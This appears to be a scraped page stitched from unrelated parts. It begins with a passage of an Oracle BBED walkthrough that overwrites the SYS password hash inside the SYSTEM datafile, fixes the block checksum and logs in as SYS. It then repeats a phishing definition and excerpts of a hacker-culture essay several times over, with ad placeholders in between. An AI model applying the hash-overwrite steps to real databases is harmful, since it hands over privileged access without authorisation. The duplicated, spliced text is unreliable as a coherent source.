FILE# 1

BBED> set block 54

BLOCK# 54

BBED> set offset 6389

OFFSET 6389

BBED> p kdbr

sb2 kdbr[0] @118 8074

sb2 kdbr[1] @120 8009

-----------------------------------------------------------

sb2 kdbr[20] @158 5965

sb2 kdbr[21] @160 8030

sb2 kdbr[22] @162 6389 - offset ( 0x18f5 )

sb2 kdbr[23] @164 7838

BBED> p*kdbr[22]

rowdata[561]

------------

ub1 rowdata[561] @6481 0x6c

BBED> x/r

rowdata[561] @6481

------------

flag@6481: 0x6c (KDRHFL, KDRHFF, KDRHFH, KDRHFC)

lock@6482: 0x00

cols@6483: 17

ckix@6484: 1

col 1[2] @6489: 0xc1 0x02

col 2[16] @6492: 0x34 0x44 0x45 0x34 0x32 0x37 0x39 0x35 0x45 0x36

0x36 0x31 0x31 0x37 0x41 0x45

col 3[1] @6509: 0x80

col 4[1] @6511: 0x80

col 5[7] @6513: 0x78 0x69 0x0b 0x0a 0x11 0x19 0x2a

col 6[7] @6521: 0x78 0x69 0x0c 0x1b 0x11 0x09 0x03

BBED> x/rn2cntn ( this command will show rows )

rowdata[561] @6481

------------

flag@6481: 0x6c (KDRHFL, KDRHFF, KDRHFH, KDRHFC)

lock@6482: 0x00

cols@6483: 17

ckix@6484: 1

col 1[2] @6489: Á.

col 2[16] @6492: 4DE42795E66117AE (34 44 45 34 32 37 39 35 45 36 36 31 31 37 41 45

col 3[1] @6509: 0

col 4[1] @6511: 0x80

col 5[7] @6513: -0

col 6[7] @6521: -0

Dump file to be sure that you are editing correct data:

BBED> dump/v dba 1,54 offset 6389 count 150

File: /ora-main/oradata/test/data/system_01.dbf (1)

Block: 54 Offsets: 6389 to 6538 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

03535953 02c10210 34444534 32373935 45363631 31374145 01800180 0778690b l .SYS.Á..4DE42795E66117AE.....xi.0a11192a 0778690c 1b110903 ffff0180 ff02c102

Find correct offset:

BBED> find /c 4DE42795E66117AE

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

------------------------------------------------------------------------------------------------------------

34444534 32373935 45363631 31374145

<48>

Offset for a this string is 6493.One more checkup before modifying:

BBED> dump/v dba 1,54 offset 6493 count 16

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

34444534 32373935 45363631 31374145 l 4DE42795E66117AE

Now I am positive that this is an offset that needs to be modified.

I will modify block using password hash value ( E2A109347F6C7832 ) previously generated on my test database;

BBED> modify/c E2A109347F6C7832 dba 1,54 offset 6493

Warning: contents of previous BIFILE will be lost. Proceed? (Y/N) y

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

------------------------------------------------------------------------

45324131 30393334 37463643 37383332

Dump block to acknowledge change:

BBED> dump/v dba 1,54 offset 6493 count 16

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

45324131 30393334 37463643 37383332 l E2A109347F6C7832

Change is there. And finally apply changes to the block:

BBED> sum dba 1,54

Check value for File 1, Block 54:

current = 0x97e0, required = 0x919b

BBED> sum dba 1,54 apply

Check value for File 1, Block 54:

current = 0x919b, required = 0x919b

It’s time to test new password. Login into production database using new password:

SQL> conn sys/testpass

Connected.

And select confirms new password hash value:

SQL> select password from dba_users where username='SYS';

PASSWORD

E2A109347F6C7832

Conclusion

References

[1] Oradebug – Undocumented Oracle Utility - Miladin Modrakovic

[2] Disassembling the Oracle Date Block - Graham Thornton

What is Phishing?

AdSense Code

In computing, phishing is a criminal activity using social engineering techniques

Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication.

Phishing is typically carried out using email or an instant message, although phone contact has been used as well.

Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures..

For more information about the topic Phishing, read the full article at Wikipedia.org, or see the following related articles.

AdSense Code

In computing, phishing is a criminal activity using social engineering techniques

Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication.

Phishing is typically carried out using email or an instant message, although phone contact has been used as well.

Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures..

For more information about the topic Phishing, read the full article at Wikipedia.org, or see the following related articles.

AdSense Code

In computing, phishing is a criminal activity using social engineering techniques

Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication.

Phishing is typically carried out using email or an instant message, although phone contact has been used as well.

Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures..

For more information about the topic Phishing, read the full article at Wikipedia.org, or see the following related articles.

Do I need to be good at math to become a hacker?

AdSense Code

No. Hacking uses very little formal mathematics or arithmetic. In particular, you won't usually need trigonometry, calculus or analysis (there are exceptions to this in a handful of specific application areas like 3-D computer graphics). Knowing some formal logic and Boolean algebra is good. Some grounding in finite mathematics (including finite-set theory, combinatorics, and graph theory) can be helpful.

Much more importantly: you need to be able to think logically and follow chains of exact reasoning, the way mathematicians do. While the content of most mathematics won't help you, you will need the discipline and intelligence to handle mathematics. If you lack the intelligence, there is little hope for you as a hacker; if you lack the discipline, you'd better grow it.

I think a good way to find out if you have what it takes is to pick up a copy of Raymond Smullyan's book What Is The Name Of This Book?. Smullyan's playful logical conundrums are very much in the hacker spirit. Being able to solve them is a good sign; enjoying solving them is an even better one.

AdSense Code

How do I tell if I am already a hacker?

AdSense Code

Ask yourself the following three questions:

Do you speak code, fluently?
Do you identify with the goals and values of the hacker community?
Has a well-established member of the hacker community ever called you a hacker?

If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.

The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project.

The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That's the inward half; the other, outward half is the degree to which you identify with the hacker community's long-term projects.

Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place?

But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests — two of them are defending free-speech rights and fending off "intellectual-property" power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we've learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they've missed the point. The right response is probably “Shut up and show them the code.”

The third test has a tricky element of recursiveness about it. I observed in the section called “What Is a Hacker?” that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past, hackers were a much less cohesive and self-aware group than they are today. But the importance of the social-network aspect has increased over the last thirty years as the Internet has made connections with the core of the hacker subculture easier to develop and maintain. One easy behavioral index of the change is that, in this century, we have our own T-shirts.

Sociologists, who study networks like those of the hacker culture under the general rubric of "invisible colleges", have noted that one characteristic of such networks is that they have gatekeepers — core members with the social authority to endorse new members into the network. Because the "invisible college" that is hacker culture is a loose and informal one, the role of gatekeeper is informal too. But one thing that all hackers understand in their bones is that not every hacker is a gatekeeper. Gatekeepers have to have a certain degree of seniority and accomplishment before they can bestow the title. How much is hard to quantify, but every hacker knows it when they see it.

AdSense Code

Ask yourself the following three questions:

Do you speak code, fluently?
Do you identify with the goals and values of the hacker community?
Has a well-established member of the hacker community ever called you a hacker?

If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.

AdSense Code

Ask yourself the following three questions:

Do you speak code, fluently?
Do you identify with the goals and values of the hacker community?
Has a well-established member of the hacker community ever called you a hacker?

If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.

Status in the Hacker Culture

AdSense Code

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

(We used to call these works “free software”, but this confused too many people who weren't sure exactly what “free” was supposed to mean. Most of us now prefer the term “open-source” software).

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

But there's a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community's hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, "the hacker community" and "open-source developers" are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so.

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.

If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it's a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term 'nerd' used to be used this way back in the 1990s, back when 'nerd' was a mild pejorative and 'geek' a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren't techies.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.

If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.
Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.
Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.
Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

Don't use a silly, grandiose user ID or screen name.
Don't get in flame wars on Usenet (or anywhere else).
Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.
Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

Other Resources

Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.

Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers.

There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.

AdSense Code

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

2. Help test and debug open-source software

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

The Hacker/Nerd Connection

If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.

Points For Style

Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.
Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.
Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.
Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
Develop your appreciation of puns and wordplay.

Finally, a few things not to do.

Don't use a silly, grandiose user ID or screen name.
Don't get in flame wars on Usenet (or anywhere else).
Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.
Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

Other Resources

Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.

Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers.

AdSense Code

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

2. Help test and debug open-source software

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

The Hacker/Nerd Connection

If you're attracted to hacking because you don't have a life, that's OK too — at least you won't have trouble concentrating. Maybe you'll get a life later on.

Points For Style

Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.
Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.
Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.
Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
Develop your appreciation of puns and wordplay.

Finally, a few things not to do.

Don't use a silly, grandiose user ID or screen name.
Don't get in flame wars on Usenet (or anywhere else).
Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.
Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.

Other Resources

Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.

Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers.

Basic Hacking Skills

AdSense Code

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.

I used to recommend Java as a good language to learn early, but this critique has changed my mind (search for “The Pitfalls of Java as a First Programming Language” within it). A hacker cannot, as they devastatingly put it “approach problem-solving like a plumber in a hardware store”; you have to know what the components actually do. Now I think it is probably best to learn C and Lisp first, then Java.

If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.

C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff — it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.

Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.

LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)

It's best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.

But be aware that you won't reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.

I can't give complete instructions on how to learn to program here — it's a complex skill. But I can tell you that books and courses won't do it — many, maybe most of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.

Peter Norvig, who is one of Google's top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His "recipe for programming success" is worth careful attention.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...

2. Get one of the open-source Unixes and learn to use and run it.

I'll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes or OpenSolaris, install it on a personal machine, and run it.

Yes, there are other operating systems in the world besides Unix. But they're distributed in binary — you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.

Under Mac OS X it's possible, but only part of the system is open source — you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.

Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)

So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.

During the first ten years of this HOWTO's life, I reported that from a new user's point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: Ubuntu. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies.

You can find BSD Unix help and resources at www.bsd.org.

A good way to dip your toes in the water is to boot up what Linux fans call a live CD, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it's a way to get a look at the possibilities without having to do anything drastic.

I have written a primer on the basics of Unix and the Internet.

I used to recommend against installing either Linux or BSD as a solo project if you're a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible even for a newbie. Nevertheless, I still recommend making contact with your local Linux user's group and asking for help. It can't hurt, and may smooth the process.

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.

This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)

But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...

4. If you don't have functional English, learn it.

As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.

Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).

Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.

Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we've generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can't yet write competently, learn to.

AdSense Code

1. Learn how to program.

2. Get one of the open-source Unixes and learn to use and run it.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.

You can find BSD Unix help and resources at www.bsd.org.

I have written a primer on the basics of Unix and the Internet.

3. Learn how to use the World Wide Web and write HTML.

To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...

4. If you don't have functional English, learn it.

AdSense Code

1. Learn how to program.

2. Get one of the open-source Unixes and learn to use and run it.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.

You can find BSD Unix help and resources at www.bsd.org.

I have written a primer on the basics of Unix and the Internet.

3. Learn how to use the World Wide Web and write HTML.

To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...

4. If you don't have functional English, learn it.

The Hacker Attitude

AdSense Code

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.

